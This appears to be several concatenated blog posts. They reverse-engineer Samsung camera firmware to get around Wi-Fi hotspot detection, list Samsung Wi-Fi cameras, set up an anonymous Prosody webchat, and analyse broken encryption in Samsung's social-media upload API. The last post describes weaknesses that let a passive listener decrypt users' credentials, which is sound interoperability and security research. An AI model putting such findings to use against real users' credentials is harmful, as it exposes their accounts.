printf "%s %x f\n" $sym $((0xc0004000 + 0x$addr))
done
Both will generate the same output that can be loaded into Ghidra via "Window" / "Script Manager" / "ImportSymbolsScript.py":
sysInit c0004000 f
archPwrDown c0004094 f
MMU_WriteControlReg c00040a4 f
MMU_WritePageTableBaseReg c00040b8 f
MMU_WriteDomainAccessReg c00040d0 f
...
Reverse engineering DevHTTPResponseStart
Now that we have the function names in place, we need to manually set the type
of quite a few DAT_
fields to "pointer", rename the parameters according to
the debug string, and we get a reasonably usable decompiler output.
The following is a commented version, edited for better readability (inlined the string references, rewrote some conditionals):
bool DevHTTPResponseStart(undefined4 handle,ushort status,char *url,char *headers) {
bool result;
opd_printf(ctx,"DevHTTPResponseStart: url=%s, handle=%x, status=%d\n, headers=%s\r\n",
url,handle,status,headers);
opd_printf(ctx,"DevHTTPResponseStart: This is YAHOO check !!!\r\n");
safnotify_page_load_status(0x68);
if ((url == NULL) || (status != 301 && status != 302 && status != 307)) {
/* this is not a HTTP redirect */
if (status == 200) {
/* HTTP 200 means OK */
if (headers == NULL ||
(strstr(headers,"domain=.yahoo") == NULL &&
strstr(headers,"Domain=.yahoo") == NULL &&
strstr(headers,"domain=kr.yahoo") == NULL &&
strstr(headers,"Domain=kr.yahoo") == NULL)) {
/* no response headers or no yahoo cookie --> check fails! */
result = true;
} else {
/* we found a yahoo cookie bit in the headers */
opd_printf(ctx,"DevHTTPResponseData: THIS IS GOOGLE/YAHOO PAGE!!!! 3333\n\n\n");
*p_request_ongoing = 0;
if (!safapi_is_browser_authed())
safnotify_auth_ap(0);
result = false;
}
} else if (status < 0) {
/* negative status = aborted? */
result = false;
} else {
/* positive status, not a redirect, not "OK" */
result = !safapi_is_browser_framebuffer_on();
}
} else {
/* this is a HTTP redirect */
char *match = strstr(url,"yahoo.");
if (match == NULL || match > (url+11)) {
opd_printf(ctx, "DevHTTPResponseStart: 301/302/307! cannot find yahoo! safapi_is_browser_framebuffer_on : %d , safapi_is_browser_authed(): %d \r\n",
safapi_is_browser_framebuffer_on(), safapi_is_browser_authed());
if (!safapi_is_browser_framebuffer_on() && !safapi_is_browser_authed()) {
opd_printf(ctx,"DevHTTPResponseStart: 302 auth failed!!! kSAFAPIAuthErrNotAuth!! \r\n");
safnotify_auth_ap(1);
}
result = false;
} else {
/* found "yahoo." in url */
opd_printf(ctx, "DevHTTPResponseStart: THIS IS GOOGLE/YAHOO/SAMSUNG PAGE!!!! 111\n\n\n");
*p_request_ongoing = 0;
if (!safapi_is_browser_authed())
safnotify_auth_ap(0);
result = false;
}
}
return result;
}
Interpreting the hotspot detection
So to summarize, the code in DevHTTPResponseStart
will check for one of two
conditions and call safnotify_auth_ap(0)
to mark the WiFi access point as
authenticated:
on a HTTP 200 OK response, the server must set a cookie on the domain
".yahoo.something"
or"kr.yahoo.something"
on a HTTP 301/302/307 redirect, the URL (presumably the redirect location?) must contain
"yahoo."
close to its beginning.
If we manually contact the queried URL, http://www.yahoo.co.kr/
, it will
redirect us to https://www.yahoo.com/
, so everything is fine?
GET / HTTP/1.1
Host: www.yahoo.co.kr
HTTP/1.1 301 Moved Permanently
Location: https://www.yahoo.com/
Well, the substring "yahoo."
is on position 12 in the url
"https://www.yahoo.com/"
, but the code is requiring it to be in one of the
first 11 positions. This check has been killed by TLS!
To pass the hotspot check, we must unwind ten years of HTTPS-everywhere, or point the DNS record to a different server that will either HTTP-redirect to a different, more yahooey name, or set a cookie on the yahoo domain.
After patching samsung-nx-emailservice accordingly, the camera will actually connect and upload photos:
Summary: the real treasure
This deep-dive allowed to understand and circumvent the hotspot detection in Samsung's WB850F WiFi camera based on one reverse-engineered function. The resulting patch was tiny, but guessing the workaround just from the packet traces was impossible due to the "detection method" implemented by Samsung's engineers. Once knowing what to look for, the same workaround was applied to cameras asking for MSN.com, thus also adding EX2F, ST200F, WB3xF and WB1100F to the supported cameras list.
However, the real treasure is still waiting! Main_Image
contains over 77k
functions, so there is more than enough for a curious treasure hunter to
explore in order to better understand how digital cameras work.
Starting in 2009, Samsung has created a wide range of compact cameras with built-in WiFi support, spread over multiple product lines. This is a reference and data collection of those cameras, with the goal to understand their WiFi functionality, and to implement image uploads on the go.
This is a follow-up to the Samsung NX mirrorless archaeology article, which also covers the Android-based compact cameras.
If you are in Europe and can donate one of the "untested" models, please let me know!
Model Line Overview
Samsung created a mind-boggling number of different compact cameras over the years, apparently with different teams working on different form factors and specification targets. They were grouped into product lines, of which only a few were officially explained:
- DV: DualView (with a second LCD on the front side for selfies)
- ES: unknown, no WiFi
- EX: high-end compact (maybe "expert"?)
- NV: New Vision, no WiFi
- MV: MultiView
- PL: unknown, no WiFi
- SH: unknown
- ST: Style feature
- WB: long-zoom models
Quite a few of those model ranges also featured cameras with a WiFi controller, allowing to upload pictures to social media or send them via email. For the WiFi-enabled cameras, Samsung has been using two different SoC brands, with multiple generations each:
Zoran COACH ("Camera On A CHip") based on a MIPS CPU.
DRIM engine ("Digital Real Image & Movie Engine") ARM CPU, based on the Milbeaut (later Fujitsu) SoC.
WiFi Cameras
This table should contain all Samsung compacts with WiFi (I did quite a comprehensive search of everything they released since 2009). It is ordered by SoC type and release date:
Camera | Release | SoC | Firmware | Upload Working |
---|---|---|---|---|
Zoran COACH (MIPS) | ||||
ST1000 | 2009-09 | COACH 10 | N/A | ❌ unknown serviceproviders API endpoint |
SH100 | 2011-01 | COACH ?? | 1107201 | ✔️ (fw. 1103021) |
ST200F | 2012-01 | COACH 12: ZR364249NCCG | 1303204 | ✔️ Yahoo (fw. 1303204(*)) |
DV300F | 2012-01 | COACH 12 | 1211084 | ✔️ (fw. 1211084) |
WB150F | 2012-01 | COACH 12 ML? | 1208074 | ✔️ (fw. 1210238) |
WB35F, WB36F, WB37F | 2014-01 | COACH 12: ZR364249BGCG | N/A | ✔️ MSN (WB37F fw. 1.60 and 1.72) |
WB50F | 2014-01 | COACH ?? | N/A | ✔️ MSN cookie (fw. 1.61) |
WB1100F | 2014-01 | COACH 12: ZR364249BGCG | N/A | ✔️ MSN (fw. 1.72?) |
WB2200F | 2014-01 | COACH ??: ZR364302BGCG | N/A | untested |
Milbeaut / DRIM engine (ARM) | ||||
WB850F | 2012-01 | DRIM engine III? | 210086 | ✔️ Yahoo (fw. 210086) |
EX2F | 2012-07 | DRIM engine III | 1301144 | ✔️ Yahoo (fw. 303194) |
WB200F | 2013-01 | Milbeaut MB91696 | N/A | ❌ hotspot (fw. 1411171) |
WB250F | 2013-01 | Milbeaut MB91696 | 1302211 | ✔️ (fw. 1302181) |
WB800F | 2013-01 | Milbeaut MB91696 | 1311061 | ✔️ MSN redirect (fw. 1308052) |
DV150F | 2013-01 | Milbeaut MB91696 | N/A | ✔️ MSN redirect (fw. 1310101) |
ST150F | 2013-01 | Milbeaut MB91696 | N/A | ✔️ MSN redirect (fw. 1310151) |
WB30F, WB31F, WB32F | 2013-01 | Milbeaut M6M2 (MB91696?) | 1310151 | ❌ hotspot (WB31F fw. 1411221) |
WB350F, WB351F | 2014-01 | Milbeaut MB865254? | N/A | ✔️ (WB351F fw. GLUANC1) |
WB380F | 2015-06? | Milbeaut MB865254? | N/A | ✔️ (fw. GLUANL6) |
Unknown / unconfirmed SoC | ||||
MV900F | 2012-07 | Zoran??? | N/A | untested |
DV180F | 2015? | same Milbeaut as DV150F? | N/A | untested |
Legend:
- ✔️ = works with samsung-nx-emailservice.
- ✔️ Yahoo/MSN = works with a respective cookie response.
- ❌ hotspot = camera mis-detects a hotspot with a login requirement, opens browser.
- untested = I wasn't (yet) able to obtain this model. Donations are highly welcome.
- pending = I'm hopefully going to receive this model soon.
- (*) the ST200F failed with the 1203294 firmware but worked after the upgrade to 1303204.
- "N/A" for firmware means, there are no known downloads / mirrors since Samsung disabled iLauncher.
- "fw. ???" means that the firmware version could not be found out due to lack of a service manual.
There are also quite a few similarly named cameras that do not have WiFi:
- DV300/DV305 (without the F)
- ST200 (no F)
- WB100, WB150, WB210, WB500, WB600, WB650, WB700, WB750, WB1000 and WB2100 (again, no F)
Hotspot Detection Mode
Most of the cameras only do a HTTP GET request for http://gld.samsungosp.com
(shut down in 2021) before failing into a browser. This is supposed to help
you login in a WiFi hotspot so that you can proceed to the upload.
Redirecting the DNS for gld.samsungosp.com
to my own server and feeding back
a HTTP 200 with the body "200 OK", as
documented in 2013 doesn't help to
make it pass the detection.
There is nothing obvious in the PCAP that would indicate what is going wrong there, and blindly providing different HTTP responses only goes this far.
Brief Firmware Analysis
Samsung used to provide firmware through the iLauncher PC application, which downloaded them from samsungmobile.com. The download service was discontinued in 2021 as well. Most camera models never had alternative firmware download locations, so suddenly it's impossible to get firmware files for them. Thanks, Samsung.
The alternative download locations that I could find are documented in the firmware table above.
Obviously, the ZORAN and the DRIMe models have different firmware structure.
The ZORAN firmware files are called <model>-DSP-<version>-full.elf
but
are not actually ELF files. Luckily,
@jam1garner already analyzed the WB35F firmware
and created tools to dissect the ELFs.
Unfortunately, none of the inner ELFs seem to contain any strings matching the
social media upload APIs known from
reverse-engineering the upload API.
Also the MIPS disassembler seems to be misbehaving for some reason, detecting
all addresses as 0x0
:
int DevHTTPResponseData(int param_1,int param_2,int param_3)
{
/* snip variables */
if (uRam00000000 != 0) {
(*(code *)0x0)(0,param_1);
}
(*(code *)0x0)(0,param_1,param_3);
if (uRam00000000 != 1) {
(*(code *)0x0)(param_2,param_3);
...
The DRIMe firmware files follow different conventions. WB850F and EX2F images are uncompressed multi-partition files that are analyzed in the WB850F reverse engineering blog post.
All other DRIMe models have compressed DATA<model>.bin
files
like the NX mini, where an
anlysis of the bootloader / compression mechanism needs to be performed prior
to analyzing the actual network stack.
Yahoo! Hotspot Detection
Some models (at least the ST200F and the WB850F) will try to connect to
http://www.yahoo.co.kr/
instead of the Samsung server. The WB1100F will
load http://www.msn.com/
. Today, these sites will redirect to HTTPS,
but the 2012 cameras won't manage modern TLS Root CAs and encryption, so they
will fail instead:
Redirecting the Yahoo hostname via DNS will also make them connect to our magic
server, but it won't be detected as proper Yahoo!, showing the hotspot
detector. Preliminary reverse engineering of the uncompressed WB850F firmware
shows that the code checks for the presence of the string domain=.yahoo
in
the response (headers). This is normally a part of a cookie set by the server,
which we can
emulate to pass the hotspot check.
Similarly, it's possible to send back a cookie for domain=.msn.com
to pass
the WB1100F check.
Screw the CORK
The Zoran models have a very fragile TCP stack. It's so fragile that it won't
process an HTTP response served in two separate TCP segments (TCP is a byte
stream, fragmentation into segments should be fully abstracted from the
application). To find that out, the author had to compare the 2014 PCAP with
the PCAPs from samsung-nx-emailservice
line by line, and see that the
latter will send the headers and the body in two TCP segments.
Luckily, TCP stacks offer an "optimization" where small payloads will be
delayed by the sender's operating system, hoping that the application will add
more data. On Linux, this is called TCP_CORK
and can be activated on any connection.
Testing it out of pure despair
suddenly made at least the ST200F and the WB1100F work. Other cameras were
only tested with this patch applied.
GPS Cameras
Of the WiFi enabled models, two cameras are also equipped with built-in GPS.
The ST1000 (also called CL65 in the USA), Samsung's first WiFi model, comes with GPS. It also contains a location database with the names of relevant towns / cities in its firmware, so it will show your current location on screen. Looks like places with more than ~10'000 inhabitants are listed. Obviously, the data is from 2009 as well.
The WB850F, a 2012 super-zoom, goes even further. You can download map files from Samsung for different parts of the world and install the maps on the SD card. It will show the location of taken photos as well, but not from the ones shot with the ST1000.
And it has a map renderer, and might even navigate you to POIs!
WiFi Camcorders
Yes, those are a thing as well. It's exceptionally hard to find any info on them. Samsung also created a large number of camcorders, but it looks like only three models came with WiFi.
From a glance at the available firmware files, they also have Linux SoCs inside, but they are not built around the known ZORAN or DRIMe chips.
The HMX-S10/S15/S16 firmware contains a number of S5PC110 string references, indicating that it's the Exynos 3110 1GHz smartphone CPU that also powered a number of Android phones.
The QF20 and QF30 again are based on the well-researched Ambarella A5s. The internet is full of reverse-engineering info on action cameras and drones based on Ambarella SoCs of all generations, including tools to disassemble and reassemble firmware images.
The QF30 is using a similar (but different!) API as the still cameras, but
over SSL and without encrypting the sensitive XML elements, and does not accept
the <Response>
element yet.
Camera | Release | SoC | Firmware | Working |
---|---|---|---|---|
HMX-S10, HMX-S15, HMX-S16 | 2010-01 | Samsung S5PC110/Exynos 3110(??) | 2011-11-14 | untested |
HMX-QF20 | 2012-01 | Ambarella A5s | 1203160 | untested |
HMX-QF30 | 2013-01 | Ambarella A5s | 14070801 | ✔️ SSLv2 (fw. 201212200) |
Legend:
- ✔️ SSLv2 = sends request via SSLv2 to port 443, needs something like socat23
The goal of this post is to make an easily accessible (anonymous) webchat for any chatrooms hosted on a prosody XMPP server, using the web client converse.js.
Motivation and prerequisites
There are two use cases:
Have an easily accessible default support room for users having trouble with the server or their accounts.
Have a working "Join using browser" button on search.jabber.network
This setup will require:
A running prosody 0.12+ instance with a
muc
component (chat.yax.im
in our example)The willingness to operate an anomyous login and to handle abuse coming from it (
anon.yax.im
)A web-server to host the static HTML and JavaScript for the webchat (
https://yaxim.org/
)
There are other places that describe how to set up a prosody server and a web server, so our focus is on configuring anonymous access and the webchat.
Prosody: BOSH / websockets
The web client needs to access the prosody instance over HTTPS. This can
be accomplished either by using
Bidirectional-streams Over Synchronous HTTP (BOSH)
or the more modern WebSocket.
We enable both mechanisms in prosody.cfg
by adding the following two
lines to the gloabl modules_enabled
list, they can also be used by
regular clients:
modules_enabled = {
...
-- add HTTP modules:
"bosh"; -- Enable BOSH access, aka "Jabber over HTTP"
"websocket"; -- Modern XMPP over HTTP stream support
...
}
You can check if the BOSH endpoint works by visiting the /http-bind/
endpoint on your prosody's HTTPS port (5281 by default).
The yax.im server is using
mod_net_multiplex
to allow both XMPP with Direct TLS and HTTPS on port 443, so the
resulting URL is
https://xmpp.yaxim.org/http-bind/.
Prosody: allowing anonymous logins
We need to add a new anonymous virtual host to the server configuration. By default, anonymous domains are only allowed to connect to services running on the same prosody instance, so they can join rooms on your server, but not connect out to other servers.
Add the new virtualhost at the end of prosody.cfg.lua
:
-- add at the end, after the other VirtualHost sections, add:
VirtualHost "anon.yax.im"
authentication = "anonymous"
-- to allow file uploads for anonymous users, uncomment the following
-- two lines (THIS IS NOT RECOMMENDED!)
-- modules_enabled = { "discoitems"; }
-- disco_items = { {"upload.yax.im"}; }
This is a new domain that needs to be made accessible to clients, so you
also need to create an SRV record and ensure that your TLS certificate
covers the new hostname as well, e.g. by updating the parameter list to
certbot
.
_xmpp-client._tcp.anon.yax.im. 3600 IN SRV 5 1 5222 xmpp.yaxim.org.
_xmpps-client._tcp.anon.yax.im. 3600 IN SRV 5 1 443 xmpp.yaxim.org.
Converse.js webchat
Converse.js is a full XMPP client written in JavaScript. The default mode is to embed Converse into a website where you have a small overlay window with the chat, that you can use while navigating the site.
However, we want to have a full-screen chat under the /chat/
URL and
use that to join only one room at a time (either the support room or a
room address that was explicitly passed) instead. For this, Converse has
the fullscreen
and singleton
modes that we need to enable.
Furthermore, Converse does not (properly) support parsing room addresses
from the URL, so we are using custom JavaScript to identify whether an
address was passed as an anchor, and fall back to the support room
yaxim@chat.yax.im
otherwise.
The following is based on release 10.1.6 of Converse.
Download the converse tarball (not converse-headless) and copy the
dist
folder into your document root.Create a folder
chat/
orwebchat/
in the document root, where the static HTML will be placedCreate an
index.html
with the following content (minimal example):
<html lang="en">
<head>
<title>yax.im webchat</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="description" content="browser-based access to the xmpp/jabber chatrooms on chat.yax.im" />
<link type="text/css" rel="stylesheet" media="screen" href="/dist/converse.min.css" />
<script src="/dist/converse.min.js"></script>
</head>
<body style="width: 100vw; height: 100vh; margin:0">
<div id="conversejs">
</div>
<noscript><h1>This chat only works with JavaScript enabled!</h1></noscript>
<script>
let room = window.location.search || window.location.hash;
room = decodeURIComponent(room.substring(room.indexOf('#') + 1, room.length));
if (!room) {
room = "yaxim@chat.yax.im";
}
converse.initialize({
"allow_muc_invitations" : false,
"authentication" : "anonymous",
"auto_join_on_invite" : true,
"auto_join_rooms" : [
room
],
"auto_login" : true,
"auto_reconnect" : false,
"blacklisted_plugins" : [
"converse-register"
],
"jid" : "anon.yax.im",
"keepalive" : true,
"message_carbons" : true,
"use_emojione" : true,
"view_mode" : "fullscreen",
"singleton": true,
"websocket_url" : "wss://xmpp.yaxim.org:5281/xmpp-websocket"
});
</script>
</div>
</body>
</html>
Back in 2009, Samsung introduced cameras with Wi-Fi that could upload images and videos to your social media account. The cameras talked to an (unencrypted) HTTP endpoint at Samsung's Social Network Services (SNS), probably to quickly adapt to changing upstream APIs without having to deploy new camera firmware.
This post is about reverse engineering the API based on a few old PCAPs and the binary code running on the NX300. We are finding a fractal of spectacular encryption fails created by Samsung, and creating a PoC reference server implementation in python/flask.
Before Samsung discontinued the SNS service in 2021, their faulty implementation allowed a passive attacker to decrypt the users social media credentials (there is no need to decrypt the media, as they are uploaded in the clear). And there were quite some buffer overflows along the way.
Skip right to the encryption fails!
History
The social media upload feature was introduced with the ST1000 / CL65 model, and soon added to the compact WB150F/WB850F/ST200F and the NX series ILCs with the NX20/NX210/NX1000 introduction.
Ironically, Wi-Fi support was implemented inconsistently over the different models and generations. There is a feature matrix for the NX models with a bit of an overview of the different Wi-Fi modes, and this post only focuses on the (also inconsistently implemented) cloud-based email and social network features.
Some models like the NX mini support sending emails as well as uploading (photos only) to four different social media platforms, other models like the NX30 came with 2GB of free Dropbox storage, while the high-end NX1 and NX500 only supported sending emails through SNS, but no social media. The binary code from the NX300 reveals 16 different platforms, whereas its UI only offers 5, and it allows uploading of photos as well as videos (but only to Facebook and YouTube). In 2015, Samsung left the camera market, and in 2021 they shut down the API servers. However, these cameras are still used in the wild, and some people complained about the termination.
Given that there is no HTTPS, a private or community-driven service could be implemented by using a custom DNS server and redirecting the camera's traffic.
Back then, I took that as a chance to reverse engineer the more straight-forward SNS email API and postponed the more complex looking social media API until now.
Email API
The easy part about the email API was that the camera sent a single HTTP POST
request with an XML form containing the sender, recipient and body text, and
the pictures attached. To succeed, the API server merely had to return 200 OK
.
Also the camera I was using (the NX500) didn't have support for any of the
other services.
POST /social/columbus/email?DUID=123456789033 HTTP/1.0
Authorization:OAuth oauth_consumer_key="censored",oauth_nonce="censored",oauth_signature="censored=",oauth_signature_method="HmacSHA1",oauth_timestamp="9717886885",oauth_version="1.0"
x-osp-version:v1
User-Agent: sdeClient
Content-Type: multipart/form-data; boundary=---------------------------7d93b9550d4a
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Pragma: no-cache
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)
Host: www.ospserver.net
Content-Length: 1321295
-----------------------------7d93b9550d4a
content-disposition: form-data; name="message"; fileName="sample.txt"
content-Type: multipart/form-data;
<?xml version="1.0" encoding="UTF-8"?>
<email><sender>Camera@samsungcamera.com</sender><receiverList><receiver>censored@censored.com</receiver></receiverList><title><![CDATA[[Samsung Smart Camera] sent you files.]]></title><body><![CDATA[Sent from Samsung Camera.
language_sh100_utf8]]></body></email>
-----------------------------7d93b9550d4a
content-disposition: form-data; name="binary"; fileName="SAM_4371.JPG"
content-Type: image/jpeg;
<snip>
-----------------------------7d93b9550d4a
The syntax is almost valid, except there is no epilogue (----foo--
) after
the image, but just a boundary (----foo
), so unpatched HTTP servers will
not consider this as a valid request.
Social media login
The challenge with the social media posting was that the camera is sending multiple XML requests, and parsing the answer from XML documents in an unknown format, which cannot be obtained from the wire after Samsung terminated the official servers. Another challenge was that the credentials are transmitted in an encrypted way, so the encryption needed to be analyzed (and possibly broken) as well. Here is the first request from the camera when logging into Facebook:
POST http://snsgw.samsungmobile.com/facebook/auth HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<Request Method="login" Timeout="3000" CameraCryptKey="58a4c8161c8aa7b1287bc4934a2d89fa952da1cddc5b8f3d84d3406713a7be05f67862903b8f28f54272657432036b78e695afbe604a6ed69349ced7cf46c3e4ce587e1d56d301c544bdc2d476ac5451ceb217c2d71a2a35ce9ac1b9819e7f09475bbd493ac7700dd2e8a9a7f1ba8c601b247a70095a0b4cc3baa396eaa96648">
<UserName Value="uFK%2Fz%2BkEchpulalnJr1rBw%3D%3D"/>
<Password Value="ob7Ue7q%2BkUSZFffy3%2BVfiQ%3D%3D"/>
<PersistKey Use="true"/>
4p4uaaq422af3"/>
<SessionKey Type="APIF"/>
<CryptSessionKey Use="true" Type="SHA1" Value="//////S3mbZSAQAA/LOitv////9IIgS2UgEAAAAQBLY="/>
<ApplicationKey Value="6a563c3967f147d3adfa454ef913535d0d109ba4b4584914"/>
</Request>
For the other social media platforms, the /facebook/
part of the URL is
replaced with the respective service name, except that some apparently use
OAuth instead of sending encrypted credentials directly.
Locating the code to reverse-engineer
Of the different models supporting the feature, the Tizen-based NX300 seemed to be the best candidate, given that it's running Linux under the hood. Even though Samsung never provided source code for the camera UI and its components, reverse-engineering an ELF binary running on a Linux host where you are root is a totally different game than trying to pierce a proprietary ARM SoC running an unknown OS from the outside.
When requesting an image upload, the camera starts a dedicated program,
smart-wifi-app-nx300
. Luckily, the NX300 FOSS dump contains three copies of
it, two of which are not stripped:
~/TIZEN/project/NX300/$ find . -type f -name smart-wifi-app-nx300 -exec ls -alh {} \;
-rwxr-xr-x 1 5.2M Oct 16 2013 ./imagedev/usr/bin/smart-wifi-app-nx300
-rwxr-xr-x 1 519K Oct 16 2013 ./image/rootdir/usr/bin/smart-wifi-app-nx300
-rwxr-xr-x 1 5.2M Oct 16 2013 ./image/rootdir_3-5/usr/bin/smart-wifi-app-nx300
Unfortunately, the actual logic is happening in libwifi-sns.so
, of which all
copies are stripped. There is a header file libwifi-sns/client_predefined.h
provided (by accident) as part of the dev image, but it only contains the
string values from which the requests are constructed:
#define WEB_XML_LOGIN_REQUEST_PREFIX "<Request Method=\"login\" Timeout=\"3000\" CameraCryptKey=\""
#define WEB_XML_USER_PREFIX "<UserName Value=\""
#define WEB_XML_PW_PREFIX "<Password Value=\""
...
The program is also doing extensive debugging through /dev/log_main
,
including the error messages that we cause when re-creating the API.
We will load both smart-wifi-app-nx300
and libwifi-sns.so
in
Ghidra and use its pretty good decompiler to get an
understanding of the code. The following code snippets are based on the
decompiler output, edited for better understanding and brevity (error checks
and debug outputs are stripped).
Processing the login credentials
When trying the upload for the first time, the camera will pop up a credentials dialog to get the username and password for the specific service:
Internally, the plain-text credentials and social network name are stored for
later processing in a global struct gWeb
, the layout of which is not
known. The field names and sizes of gWeb
fields in the following code blocks
are based on correlating debug prints and memset()
size arguments, and need
to be taken with a grain of salt.
The actual auth request is prepared by the WebLogin
function, which will
resolve the numeric site ID into the site name (e.g. "facebook"
or
"kakaostory"
), get the appropriate server name ("snsgw.samsungmobile.com"
or a regional endpoint like na-snsgw.samsungmobile.com
for North America),
and call into WebMakeLoginData()
to encrypt the login credentials and
eventually to create a HTTP POST payload:
bool WebMakeLoginData(char *out_http_request,int site_idx) {
/* snip quite a bunch of boring code */
switch (WebCheckSNSGatewayLocation(site_idx)) {
case /*0*/ LOCATION_EUROPE:
host = "snsgw.samsungmobile.com"; break;
case /*1*/ LOCATION_USA:
host = "na-snsgw.samsungmobile.com"; break;
case /*2*/ LOCATION_CHINA:
host = "cn-snsgw.samsungmobile.com"; break;
case /*3*/ LOCATION_SINGAPORE:
host = "as-snsgw.samsungmobile.com"; break;
case 4 /* unsure, maybe staging? */:
host = "sta.snsgw.samsungmobile.com"; break;
default: /* Asia? */
host = "as-snsgw.samsungmobile.com"; break;
}
Web_Encrypt_Init();
Web_Get_Duid(); /* calculate device unique identifier into gWeb.duid */
Web_Get_Encrypted_Id(); /* encrypt user id into gWeb.enc_id */
Web_Get_Encrypted_Pw(); /* encrypt password into gWeb.enc_pw */
Web_Get_Camera_CryptKey(); /* encrypt keyspec into gWeb.encrypted_session_key */
URLEncode(&encrypted_session_key,gWeb.encrypted_session_key);
if (site_idx == /*5*/ SITE_SAMSUNGIMAGING || site_idx == /*6*/ SITE_CYWORLD) {
WebMakeDataWithOAuth(out_http_request);
} else if (site_idx == /*14*/ SITE_KAKAOSTORY) {
/* snip HTTP POST with unencrypted credentials to sandbox-auth.kakao.com */
} else {
/* snip and postpone HTTP POST with XML payload to snsgw.samsungmobile.com */
}
}
From there, Web_Encrypt_Init()
is called to reset the gWeb
fields, to
obtain a new (symmetric) encryption key, and to encrypt the application_key
:
bool Web_Encrypt_Init(void) {
char buffer[128];
memset(gWeb.keyspec,0,64);
memset(gWeb.encrypted_application_key,0,128);
memset(gWeb.enc_id,0,64);
memset(gWeb.enc_pw,0,64);
memset(gWeb.encrypted_session_key,0,512);
memset(gWeb.duid,0,64);
generateKeySpec(&gWeb.keyspec);
dataEncrypt(&buffer,gWeb.application_key,gWeb.keyspec);
URLEncode(&gWeb.encrypted_application_key,buffer);
}
We remember the very interesting generateKeySpec()
and dataEncrypt()
functions for later analysis.
WebMakeLoginData()
also calls Web_Get_Encrypted_Id()
and
Web_Get_Encrypted_Pw()
to obtain the encrypted (and base64-encoded) username
and password. Those follow the same logic of dataEncrypt()
plus
URLEncode()
to store the encrypted values in respective fields in gWeb
as well.
bool Web_Get_Encrypted_Pw() {
char buffer[128];
memset(gWeb.enc_pw,0,64);
dataEncrypt(&buffer,gWeb.password,gWeb.keyspec);
URLEncode(&gWeb.enc_pw,buffer);
}
Interestingly, we are using a 128-byte intermediate buffer for the encryption
result, and URL-encoding it into a 64-byte destination field. However,
gWeb.password
is only 32 bytes, so we are hopefully safe here. Nevertheless,
there are no range checks in the code.
Finally, it calls Web_Get_Camera_CryptKey()
to RSA-encrypt the generated
keyspec
and to store it in gWeb.encrypted_session_key
. The actual
encryption is done by encryptSessionKey(&gWeb.encrypted_session_key,gWeb.keyspec)
which we should also look into.
Generating the secret key: generateKeySpec()
That function is as straight-forward as can be, it requests two blocks of random data into a 32-byte array and returns the base-64 encoded result:
int generateKeySpec(char **out_keyspec) {
char rnd_buffer[32];
int result;
char *rnd1 = _secureRandom(&result);
char *rnd2 = _secureRandom(&result);
memcpy(rnd_buffer, rnd1, 16);
memcpy(rnd_buffer+16, rnd2, 16);
char *b64_buf = String_base64Encode(rnd_buffer,32,&result);
*out_keyspec = b64_buf;
}
(In)secure random number generation: _secureRandom()
It's still worth looking into the source of randomness that we are using,
which hopefully should be /dev/random
or at least /dev/urandom
, even on an
ancient Linux system:
char *_secureRandom(int *result)
{
srand(time(0));
char *target = String_new(20,result);
String_format(target,20,"%d",rand());
target = _sha1_byte(target,result);
return target;
}
WAIT WHAT?! Say that again, slowly! You are initializing the libc
pseudo-random number generator with the current time, with one-second
granularity, then getting a "random" number from it somewhere between 0
and
RAND_MAX = 2147483647
, then printing it into a string and calculating a
20-byte SHA1 sum of it?!?!?!
Apparently, the Samsung engineers never heard of the Debian OpenSSL random number generator, or they considered imitating it a good idea?
The entropy of this function depends only on how badly the user maintains the camera's clock, and can be expected to be about six bits (you can only set minutes, not seconds, in the camera), instead of the 128 bits required.
Calling this function twice in a row will almost always produce the same insecure block of data.
The function name _sha1_byte()
is confusing as well, why is it a singular
byte, and why is there no length
parameter?
char *_sha1_byte(char *buffer, int *result) {
int len = strlen(buffer);
char *shabuf = malloc(20);
int hash_len = 20;
memset(shabuf,0,hash_len);
SecCrHash(shabuf,&hash_len);
return shabuf;
That looks plausible, right? We just assume that buffer
is a NUL-terminated
string (the string we pass from _secureRandom()
is one), and then we...
don't pass it into the SecCrHash()
function? We only pass the virgin 20-byte
target array to write the hash into? The hash of what?
int SecCrHash(void *dst, int *out_len) {
char buf [20];
*out_len = 20;
memcpy(dst, buf, *out_len);
return 0;
}
It turns out, the SecCrHash
function (secure cryptographic hash?) is
not hashing anything, and it's not processing any input, it's just copying 20
bytes of uninitialized data from the stack to the destination buffer. So
instead of returning an obfuscated timestamp, we are returning some (even
more deterministic) data that previous function calls worked with.
Well, from an attacker point of view, this actually makes cracking the key (slightly) harder, as we can't just fuzz around the current time, we need to actually get an understanding of the calls happening before that and see what kind of data they can leave on the stack.
SPOILER: No, we don't have to. Samsung helpfully leaked the symmetric encryption key for us. But let's still finish this arc and see what else we can find. Skip to the encryption key leak.
Encrypting values: dataEncrypt()
The secure key material in gWeb.keyspec
is passed to
dataEncrypt()
to actually encrypt strings:
int dataEncrypt(char **out_enc_b64, char *message, char *key_b64) {
int result;
char *keyspec;
String_base64Decode(key_b64,&keyspec,&result);
char key[16];
char iv[16];
memcpy(key, keyspec, 16);
memcpy(iv, keyspec+16, 16);
return _aesEncrypt(message, key, iv, &result);
}
char *_aesEncrypt(char *message, char *key, char *iv, int *result) {
int bufsize = (strlen(message) + 15) & ~15; /* round up to block size */
char *enc_data = malloc(bufsize);
SecCrEncryptBlock(&enc_data,&bufsize,message,bufsize,key,16,iv,16);
char *ret_buf = String_base64Encode(enc_data,bufsize,result);
free(enc_data);
return ret_buf;
}
The _aesEncrypt()
function is calling SecCrEncryptBlock()
and
base-64-encoding the result. From SecCrEncryptBlock()
we have calls into
NAT_CipherInit()
and NAT_CipherUpdate()
that are initializing a cipher
context, copying key material, and passing all calls through function
pointers in the cipher context, but it all boils down to doing standard
AES-CBC, with the first half of keyspec
used as the encryption key, and the
second half as the IV, and the (initial) IV being the same for all
dataEncrypt()
calls.
The prefixes SecCr
and NAT
imply that some crypto library is in use, but
there are no obvious results on google or github, and the function names are
mostly self-explanatory.
Encrypting the secret key: encryptSessionKey()
This function will decode the base64-encoded 32-byte keyspec, and encrypt it with a hard-coded RSA key:
